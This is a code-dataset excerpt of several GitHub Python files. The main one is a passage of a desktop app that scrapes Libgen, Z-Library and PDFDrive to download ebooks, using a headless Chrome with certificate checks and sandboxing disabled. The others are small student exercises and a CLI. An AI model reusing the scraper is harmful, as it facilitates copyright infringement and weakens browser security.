BeautifulSoup(result_2.text, \"lxml\")\n d = soup.select(\"#download > h2 > a\")\n download_link = d[0].get('href')\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n url = download_link\n book_name = remove_character_not_valid_in_pdfname(table_2['Title'][index_number])\n downloads_path = str(Path.home() / \"Downloads\")\n global keep_running\n if(extension == 'pdf'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.pdf\"\n file_path_while_downloading = f\"{downloads_path}\\\\{book_name}.pdf.part\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0) \n button_1['state'] = \"normal\" \n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n elif(extension == 'epub'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.epub\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0)\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n else:\n download_of_libgen_completed = False\n return download_of_libgen_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------- PDF-Drive ------------------------------------------------------------------------------------------\ndef search_in_pdf_drive(author_searched_by_user, book_searched_by_user):\n author = author_searched_by_user\n author = author.split()\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"-\")\n link_to_search = f\"http://www.pdfdrive.com/{to_search_online}-books.html\"\n download_of_pdfdrive_completed = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n name_of_books = soup.select(\".ai-search > h2\")\n year_of_books = soup.select(\".file-info > .fi-year \")\n downloads_of_books = soup.select(\".file-info > .fi-hit\")\n to_make_download_links = soup.select(\".file-right > a \")\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n a = []\n b = []\n for x in name_of_books:\n a.append(x.getText())\n for y in downloads_of_books:\n b.append(int(y.getText().split(\" \")[0].replace(\",\", \"\")))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n df_book = DataFrame(data=zip(a, b), columns=[\"Book\", \"Downloads\"])\n df_book = df_book.astype({\"Book\": str, \"Downloads\": int})\n df_book.sort_values(\"Downloads\", ascending=False, inplace=True)\n index_of_book = -1\n for x in df_book.index:\n if df_book.loc[x][\"Book\"].lower().find(to_search.lower()) == 0:\n index_of_book = x\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if index_of_book > -1:\n raw_download_link = to_make_download_links[index_of_book].get(\"href\")\n download_link = raw_download_link[::-1].replace(\"e\", \"d\", 1)[::-1]\n link_of_download_page = f\"http://www.pdfdrive.com{download_link}\"\n result = requests.get(f\"http://www.pdfdrive.com{raw_download_link}\")\n soup = BeautifulSoup(result.text, \"lxml\")\n book_info_for_pdfdrive = soup.select(\".ebook-file-info > .info-green\")\n global byte_info_for_pdfdrive\n for i in book_info_for_pdfdrive:\n if \"KB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n elif \"MB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n download_of_pdfdrive_completed = selenium_headless_downloader(\"pdfdrive\", link_of_download_page, \"pdf\")\n else:\n download_of_pdfdrive_completed = False\n except:\n pass\n return download_of_pdfdrive_completed\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------ Zlib --------------------------------------------------------------------------------\ndef search_in_zlib(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = (to_search.replace(\" \", \"%20\") + \"%20\" + author.replace(\" \", \"%20\"))\n link_to_search = f\"https://b-ok.asia/s/{to_search_online}/?languages%5B0%5D=english&extensions%5B0%5D={extension}\"\n author = author.split()\n download_of_zlib_completed = False\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".book-rating-interest-score\")\n b = soup.select(\".book-rating-quality-score\")\n book_rating_interest_score_list = array([float(x.getText().strip()) for x in a])\n book_rating_quality_score_list = array([float(y.getText().strip()) for y in b])\n rating_of_book_list = (book_rating_interest_score_list + book_rating_quality_score_list)\n d = soup.find_all(\"h3\", itemprop=\"name\")\n link_of_book_list = [(\"https://b-ok.asia\" + x.select(\"a\")[0].get(\"href\")) for x in d]\n title_of_book_list = [x.select(\"a\")[0].getText() for x in d]\n # ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n e = soup.find_all(\"div\", class_=\"authors\")\n author_list = []\n for length in e:\n individual_author_name = \"\"\n for element in length:\n individual_author_name = individual_author_name + element.getText() + \" \"\n author_list.append(individual_author_name)\n books_dataframe = DataFrame({\"Title\": title_of_book_list,\"Author\": author_list,\"Rating\": rating_of_book_list,\"Link\": link_of_book_list,})\n books_dataframe = books_dataframe.astype({\"Title\": str, \"Author\": str, \"Rating\": float, \"Link\": str})\n books_dataframe.sort_values(\"Rating\", ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author,): \n actual_author_name = books_dataframe[\"Author\"][index_for_author].split(\" \") \n result = (False)\n for (word) in (actual_author_name): \n if word in author: \n result = True\n break\n if len(author) == 0:\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book,): \n len_of_book_searched = len(to_search.split(\" \")) \n len_of_book_by_zlib = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \") \n split_of_book_by_zlib = title_of_book.lower().split(\" \") \n no_of_matches = 0 \n for i in range(0, len_of_book_by_zlib): \n if (split_of_book_by_zlib[i].lower() in to_search.lower()): \n no_of_matches += (1)\n if no_of_matches != len_of_book_by_zlib:\n no_of_matches = 0\n for i in range(0, len_of_book_searched): \n if (split_of_book_by_user[i].lower() in title_of_book.lower()): \n no_of_matches += 1\n return (no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_zlib)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n index_number = 0\n for(i) in (books_dataframe.index): \n if (check_for_title(books_dataframe[\"Title\"][i])) & (check_for_author(i)): \n book_found = True\n index_number = i \n break\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if book_found:\n link_of_download_page = books_dataframe.loc[index_number, \"Link\"]\n try:\n result = requests.get(link_of_download_page)\n soup = BeautifulSoup(result.text, \"lxml\")\n global pdf_size_to_download_for_zlib\n pdf_size_to_download_for_zlib = soup.select(\".bookDetailsBox > .bookProperty.property__file > .property_value \")[0].getText().split(\",\")[1]\n except:\n print(\"Error faced\")\n download_of_zlib_completed = selenium_headless_downloader(\"zlib\", link_of_download_page, extension)\n else:\n download_of_zlib_completed = False\n except:\n pass\n return download_of_zlib_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------ SELENIUM FOR PDF-DRIVE & ZLIB ----------------------------------------------------------------\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os_path.dirname(__file__)\n return os_path.join(base_path, relative_path)\n# ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_for_pdfdrive(pdf_name: str,) -> str:\n chars = list(\"/:?*<>|,.();\")\n result = pdf_name\n for char in chars:\n result = result.replace(char, \"_\")\n return result\ndownloads_path = str(Path.home() / \"Downloads\")\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_pdfdrive(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", class_=\"ebook-title\")\n title_of_book = a.select(\"a\")[0].getText()\n title_of_book = title_of_book.replace(\":\", \"_\")\n return title_of_book\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_zlib(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", itemprop=\"name\").getText()\n a = a.strip(\" \\n\")\n b = soup.find(\"div\", class_=\"col-sm-9\")\n b = b.find_all(\"a\", title=\"Find all the author's books\")\n title_of_pdf = a\n c = \"\"\n if len(b) > 1:\n for x in b:\n c = c + x.getText() + \", \"\n c = c.strip(\", \")\n title_of_pdf = title_of_pdf + \" \" + f\"({c})\"\n elif len(b) == 1:\n title_of_pdf = title_of_pdf + \" \" + f\"({b[0].getText()})\"\n return title_of_pdf\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef selenium_headless_downloader(website, download_link, extension):\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\"\n options = webdriver.ChromeOptions()\n options.headless = True\n options.add_argument(f\"user-agent={user_agent}\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--allow-running-insecure-content\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_experimental_option(\"detach\", True)\n driver = webdriver.Chrome(resource_path(\"chromedriver.exe\"), options=options)\n params = {\"behavior\": \"allow\", \"downloadPath\": downloads_path}\n driver.execute_cdp_cmd(\"Page.setDownloadBehavior\", params)\n download_complete_via_selenium = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if website == \"pdfdrive\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n driver.implicitly_wait(10)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n content = driver.find_elements(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n if len(content) == 0:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-primary.btn-user\") \n else:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n elif website == \"zlib\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n content = driver.find_element(By.CLASS_NAME, \"book-details-button\")\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n content.click()\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n title_of_book = \"\"\n if website == \"pdfdrive\":\n print(\"Downloading E-Book from PDF-Drive Please check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_pdfdrive(download_link)\n title_of_book = remove_unwanted_characters_for_pdfdrive(title_of_book)\n title_of_book = title_of_book + \" ( PDFDrive )\"\n file_name_pdfdrive = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_pdfdrive == \"\"):\n file_name_pdfdrive = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {byte_info_for_pdfdrive.split()[1]} / {byte_info_for_pdfdrive}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_pdfdrive):\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n epub_to_pdf_gen()\n download_complete_via_selenium = True\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n elif website == \"zlib\":\n result = requests.get(driver.current_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n try:\n driver.find_element(By.CLASS_NAME, \"download-limits-error\")\n download_complete_via_selenium = False\n print(\"Zlibs Daily Limit Error\")\n except:\n print(\"Downloading E-Book from Zlib \\nPlease check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_zlib(download_link)\n title_of_book = remove_character_not_valid_in_pdfname(title_of_book)\n title_of_book = title_of_book + \" (z-lib.org)\"\n file_name_zlib = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_zlib == \"\"):\n file_name_zlib = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} MB / {str(pdf_size_to_download_for_zlib)}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_zlib):\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n download_complete_via_selenium = True\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n return download_complete_via_selenium\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------- SEARCH A BOOK ---------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_from_author(a):\n char_list = \"/:?*<>|,.();\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\ndef easy_search_for_book(a):\n char_list = \":?;*,(|#[!@$%+={<\"\n for i in char_list:\n if(i in a):\n a = a.split(i)[0]\n break\n return a\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef search_the_book(author_, book_):\n author = author_\n book = book_\n characters_to_strip = \" .,;:/?!#*&^-}_{~`@$%)[](<>|+=\"\n author = author.strip(characters_to_strip)\n book = book.strip(characters_to_strip)\n author = remove_unwanted_characters_from_author(author)\n book = easy_search_for_book(book)\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n extension_pdf = 'pdf'\n if(search_in_libgen(author, book, extension_pdf) == False):\n if(search_in_zlib(author, book, extension_pdf) == False):\n extension_epub = 'epub'\n if(search_in_libgen(author, book, extension_epub) == False):\n if(search_in_zlib(author, book, extension_epub) == False):\n extension_pdf = 'pdf'\n if(search_in_pdf_drive(author, book) == False):\n print('The Book is not available in the Ebook Format')\n info_text.config(text=\"Book Not Available\")\n button_1['state'] = \"normal\"\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------Current GUI -----------------------------------------------------------------------------------------------------------------------\nwindow = Tk()\nwindow.geometry(\"574x230\")\nwindow.title(\"Books.io\")\nphoto = PhotoImage(file=resource_path(\"book.png\"))\nwindow.iconphoto(False, photo)\nwindow.configure(bg=\"#FFFFFF\")\ncanvas = Canvas(window,bg=\"#FFFFFF\",height=287,width=574,bd=0,highlightthickness=0,relief=\"ridge\")\ncanvas.place(x=0, y=0)\ncanvas.create_text(27.600372314453125,96.34383392333984,anchor=\"nw\",text=\"Author\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\ninfo_text = Label(window,background=\"#FFFFFF\",text=\"\",font=(\"Abel Regular\", 7))\ninfo_text.place(relx=0.0,rely=1.0,anchor='sw')\ninfo_text_for_download = Label(window,background=\"#FFFFFF\",text=\"Tip: Use the exact Book Title and Author Name\",font=(\"Abel Regular\", 7),fg=\"green\")\ninfo_text_for_download.place(relx=0.16,rely=0.04)\ndef callback(url):\n webbrowser.open_new_tab(url)\ninfo_text_for_github = Label(window,background=\"#FFFFFF\",text=\"Give a star to our project\",fg=\"blue\",cursor=\"hand2\",font=(\"Abel Regular\", 7))\ninfo_text_for_github.pack()\ninfo_text_for_github.bind(\"\", lambda e: callback(\"https://github.com/RohitKonge/PDF-Version-of-any-Book\"))\ninfo_text_for_github.place(relx=1.0,rely=1.0,anchor='se')\ncanvas.create_text(32.243743896484375,28.401931762695312,anchor=\"nw\",text=\"Book\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\nentry_image_1 = PhotoImage(file=resource_path(\"entry_1.png\"))\nentry_bg_1 = canvas.create_image(316.0,38.5,image=entry_image_1)\nentry_1 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_1.place(x=94.0,y=28.6,width=444.0,height=22.0)\nentry_image_2 = PhotoImage(file=resource_path(\"entry_2.png\"))\nentry_bg_2 = canvas.create_image(316.0,106.5,image=entry_image_2)\nentry_2 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_2.place(x=94.0,y=96.6,width=444.0,height=22.0)\ndef btn_click():\n book_inp = entry_1.get(1.0, \"end-1c\")\n author_inp = entry_2.get(1.0, \"end-1c\")\n book_inp = book_inp.strip()\n author_inp = author_inp.strip()\n book_inp = book_inp.title()\n author_inp = author_inp.title()\n global keep_running\n if(book_inp == \"\" and author_inp == \"\"):\n info_text.config(text=\"Please enter the Book's Title and Author\")\n button_1['state'] = \"normal\"\n elif(book_inp == \"\" and author_inp != \"\"):\n info_text.config(text=\"Please enter the Book's Title\")\n button_1['state'] = \"normal\"\n else:\n keep_running = True\n search_the_book(author_inp, book_inp)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\ndef thread_make():\n if(check_internet_connection()):\n info_text.config(text=\"Searching....\")\n button_1['state'] = \"disabled\"\n try:\n thread_1 = Thread(target=btn_click)\n thread_1.start()\n except:\n info_text.config(text=\"Please Restart the App\")\ndef check_internet_connection():\n connected_to_internet = False\n IPaddress = gethostbyname(gethostname())\n if IPaddress == \"127.0.0.1\":\n connected_to_internet = False\n info_text.config(text=\"Check your internet connection\")\n else:\n connected_to_internet = True\n return connected_to_internet\ncheck_internet_connection()\nbutton_image_1 = PhotoImage(file=resource_path(\"button_1.png\"))\nbutton_1 = Button(image=button_image_1,borderwidth=0,highlightthickness=0,command=thread_make,relief=\"flat\",cursor=\"hand2\",state=\"normal\")\nbutton_1.place(x=200.0,y=150.0,width=174.8668212890625,height=43.995155334472656)\ndef on_opening():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e) \ndef on_closing():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\n window.destroy()\non_opening()\nwindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nwindow.resizable(False, False)\nwindow.attributes('-topmost', 1)\nwindow.mainloop()\n# -------------------------------------------------------------- Current GUI ---------------------------------------------------------------------------------------\n# Code For .exe :\n# pyinstaller Books.py -n Books.io -w --add-binary chromedriver.exe;. -i book.png --add-data book.png;. --add-data entry_1.png;. --add-data entry_2.png;. --add-data button_1.png;.\n","repo_name":"RohitKonge/PDF-Version-of-any-Book","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":35211,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"}
+{"seq_id":"32807061153","text":"import sys\r\n\r\nfrom student import Student, Grade\r\nfrom teacher import Teacher, Load\r\n\r\nstudent = []\r\nteacher = []\r\n\r\n\r\ndef addStudent():\r\n while True:\r\n print()\r\n print('T = Add Teacher')\r\n print('S = Add student')\r\n print()\r\n\r\n add = input('Choose T or S: ')\r\n add = add.upper()\r\n print()\r\n\r\n if add == 'S':\r\n idNum: str = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter First Name: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n year = input('Enter Year level: ')\r\n course = input('Enter Course: ')\r\n section = input('Enter Section: ')\r\n print('_____________________________________________________________________________________________________')\r\n introToComputing = int(input('Enter Introduction to Computing grade: '))\r\n archOrg = int(input('Enter Architecture and Organization grade: '))\r\n sysFun = int(input('Enter System Fundamentals grade: '))\r\n oop = int(input('Enter Object-oriented Programming grade: '))\r\n\r\n student1 = Grade(introToComputing, archOrg, sysFun, oop)\r\n student1.lastName = lastName\r\n student1.firstName = firstName\r\n student1.middleName = middleName\r\n student1.type = type\r\n student1.year = year\r\n student1.course = course\r\n student1.section = section\r\n student1.append(student1)\r\n\r\n\r\n elif add == 'T':\r\n idNum = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter FirstName: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n print('_____________________________________________________________________________________________________')\r\n department = input('Enter Department: ')\r\n position = input('Enter position: ')\r\n subjects = input('Enter Subjects: ')\r\n\r\n teacher1 = Load(subjects)\r\n teacher1.department = department\r\n teacher1.position = position\r\n teacher1.idNum = idNum\r\n teacher1.lastName = lastName\r\n teacher1.firstName = firstName\r\n teacher1.middleName = middleName\r\n teacher1.type = type\r\n teacher1.append(teacher1)\r\n\r\n else:\r\n menu()\r\n\r\n print()\r\n answer = input('Enter another? [y/n]: ')\r\n answer = answer.lower()\r\n\r\n if answer == 'y':\r\n break\r\n menu()\r\n\r\n\r\ndef delRecord():\r\n print()\r\n print('T = delete from Teacher')\r\n print('S = delete from Student')\r\n print('DT = Delete Teacher Record')\r\n print('DS = Delete Student Record')\r\n print('C = clear all')\r\n print()\r\n\r\n delete = input('What do you want to delete? ')\r\n delete = delete.upper()\r\n\r\n if delete == 'S':\r\n i: int = int(input('Enter Index number: '))\r\n student.pop(i)\r\n elif delete == 'T':\r\n i: int = int(input('Enter Index number: '))\r\n teacher.clear()\r\n elif delete == 'DT':\r\n teacher.clear()\r\n elif delete == 'DS':\r\n student.clear()\r\n elif delete == 'C':\r\n student.clear()\r\n teacher.clear()\r\n else:\r\n delRecord()\r\n\r\n menu()\r\n\r\n\r\ndef searRecord():\r\n print()\r\n print('T = search for Teacher')\r\n print('s - Search for Student')\r\n print()\r\n\r\n search = input('What type do you want to search? ')\r\n search = search.upper()\r\n\r\n if search == 'S':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {student[i].getType()} \\t | {student[i].getName()} \\t | {student[i].getID()} \\t | {student[i].getYrCrSec()} \\t | {student[i].getAve()} ')\r\n elif search == 'T':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {teacher[i].getType()} \\t | {teacher[i].getName()} \\t | {teacher[i].getID()} \\t | {teacher[i].getDeptPost()} \\t | {teacher[i].getSub()}')\r\n else:\r\n searRecord()\r\n menu()\r\n\r\n\r\ndef displayRecord():\r\n print()\r\n print('TD = display teacher')\r\n print('SD - display student')\r\n print('DA - display all')\r\n print()\r\n\r\n display1 = input('What type do you want to display? ')\r\n display1 = display1.upper()\r\n\r\n if display1 == 'SD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'TD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'DA':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('-----------------------------------------------------------------------------------------------------')\r\n\r\n else:\r\n displayRecord()\r\n menu()\r\n\r\n\r\ndef menu():\r\n print('------------------Menu---------------------')\r\n print('DR - delete record SR - search record')\r\n print('A - add record M - display all')\r\n print()\r\n\r\n choice = input('Enter a function: ')\r\n choice = choice.upper()\r\n\r\n if (choice == 'DR'):\r\n delRecord()\r\n elif (choice == 'A'):\r\n addStudent()\r\n elif (choice == 'SR'):\r\n searRecord()\r\n elif (choice == 'M'):\r\n displayRecord()\r\n else:\r\n print()\r\n\r\n\r\nmenu()\r\n","repo_name":"maeannnn/Assignment","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30810760982","text":"\"\"\"\nCommand line utility for interacting with SKA Science Data Processor (SDP).\n\nUsage:\n ska-sdp COMMAND [options] [SDP_OBJECT] [...]\n ska-sdp COMMAND (-h|--help)\n ska-sdp (-h|--help)\n\nSDP Objects:\n pb Interact with processing blocks\n workflow Interact with available workflow definitions\n deployment Interact with deployments\n sbi Interact with scheduling block instances\n master Interact with Tango master device\n subarray Interact with Tango subarray device\n\nCommands:\n list List information of object from the Configuration DB\n get | watch Print all the information (i.e. value) of a key in the Config DB\n create Create a new, raw key-value pair in the Config DB;\n Run a workflow; Create a deployment\n update Update a raw key value from CLI\n edit Edit a raw key value from text editor\n delete Delete a single key or all keys within a path from the Config DB\n import Import workflow definitions from file or URL\n\"\"\"\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom ska_sdp_config import config\n\nfrom ska_sdp_config.ska_sdp_cli import (\n sdp_get,\n sdp_create,\n sdp_update,\n sdp_list,\n sdp_delete,\n sdp_import,\n)\n\nLOG = logging.getLogger(\"ska-sdp\")\nLOG.setLevel(logging.INFO)\nLOG.addHandler(logging.StreamHandler(sys.stdout))\n\nCOMMAND = \"COMMAND\"\n\n\ndef main(argv=None):\n \"\"\"Run ska-sdp.\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n args = docopt(__doc__, argv=argv, options_first=True)\n cfg = config.Config()\n\n if args[COMMAND] == \"list\":\n sdp_list.main(argv, cfg)\n\n elif args[COMMAND] == \"get\" or args[COMMAND] == \"watch\":\n sdp_get.main(argv, cfg)\n\n elif args[COMMAND] == \"create\":\n sdp_create.main(argv, cfg)\n\n elif args[COMMAND] == \"update\" or args[COMMAND] == \"edit\":\n sdp_update.main(argv, cfg)\n\n elif args[COMMAND] == \"delete\":\n sdp_delete.main(argv, cfg)\n\n elif args[COMMAND] == \"import\":\n sdp_import.main(argv, cfg)\n\n else:\n LOG.error(\n \"Command '%s' is not supported. Run 'ska-sdp --help' to view usage.\",\n args[COMMAND],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/sdp-config","sub_path":"src/ska_sdp_config/ska_sdp_cli/ska_sdp.py","file_name":"ska_sdp.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30650950835","text":"import sys\n\ndef find(n, k, s): # n은 순열의 인덱스, k는 이전 방문위치, s는 현재까지의 소모량\n global minV\n if n == N: # 순열이 완성된 경우\n s += e[k][0] # 사무실까지의 거리 추가\n if minV>s: # 기존의 최소값보다 작으면\n minV = s\n return\n elif minV <= s: # 순열이 완성되지 않았지만 합이 최소값보다 큰 경우\n return\n else:\n for i in range(1, N): # 순열의 n번 인덱스에 들어갈 숫자 선택\n if u[i] == 0:\n u[i] = 1\n find(n+1, i, s+e[k][i])\n u[i] = 0\n return\n\nsys.stdin = open('input.txt', 'r')\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n e = [list(map(int,input().split())) for x in range (N)]\n u = [0 for i in range(N+1)] # 사용한 숫자 표시\n p = [0 for i in range(N+1)] # 순열저장\n minV = 10000\n u[0] = 1 # 0번은 사무실이므로 고정\n find(1, 0, 0)\n print('#{} {}'.format(tc, minV))\n","repo_name":"pyjune/ssa2019","sub_path":"0326/전기카트2.py","file_name":"전기카트2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24781572479","text":"from cs50 import get_float\n\nwhile True:\n dollars = get_float(\"Change owed: \")\n if dollars > 0:\n break\n\ncents = dollars * 100\nquaters = cents // 25\ncents -= quaters * 25\ndimes = cents // 10\ncents -= dimes * 10\nnickels = cents // 5\ncents -= nickels * 5\npennies = cents // 1\n\nprint(int(quaters + dimes + nickels + pennies))\n","repo_name":"marsiekiera/CS50x","sub_path":"pset6/cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
